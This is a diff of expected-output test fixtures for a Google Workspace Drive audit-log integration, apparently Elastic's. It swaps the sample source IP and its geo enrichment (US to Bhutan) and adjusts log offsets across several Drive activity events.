-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"add_to_folder\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"destination_folder_id\",\"value\":\"1234\"},{\"name\":\"destination_folder_title\",\"value\":\"folder title\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"add_to_folder\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"destination_folder_id\",\"value\":\"1234\"},{\"name\":\"destination_folder_title\",\"value\":\"folder title\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "change"
@@ -35,24 +35,20 @@
         "log.offset": 0,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "owner"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -75,7 +71,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"approval_canceled\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"approval_canceled\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "change"
@@ -97,27 +93,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 816,
+        "log.offset": 815,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "owner"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -140,7 +132,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"approval_comment_added\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"approval_comment_added\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "change"
@@ -162,27 +154,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1529,
+        "log.offset": 1527,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "owner"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -205,7 +193,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"approval_requested\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"approval_requested\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "change"
@@ -227,27 +215,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2247,
+        "log.offset": 2244,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "owner"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -270,7 +254,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"approval_reviewer_responded\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"approval_reviewer_responded\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "change"
@@ -292,27 +276,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2961,
+        "log.offset": 2957,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "owner"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -333,7 +313,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"create\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"create\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "creation"
@@ -355,27 +335,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 3684,
+        "log.offset": 3679,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "owner"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -396,7 +372,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"delete\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"delete\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "deletion"
@@ -418,27 +394,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 4386,
+        "log.offset": 4380,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "owner"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -459,7 +431,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"download\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"download\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "info"
@@ -481,27 +453,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 5088,
+        "log.offset": 5081,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "owner"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -522,7 +490,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"edit\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"edit\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "change"
@@ -544,27 +512,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 5792,
+        "log.offset": 5784,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "owner"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -585,7 +549,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"add_lock\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
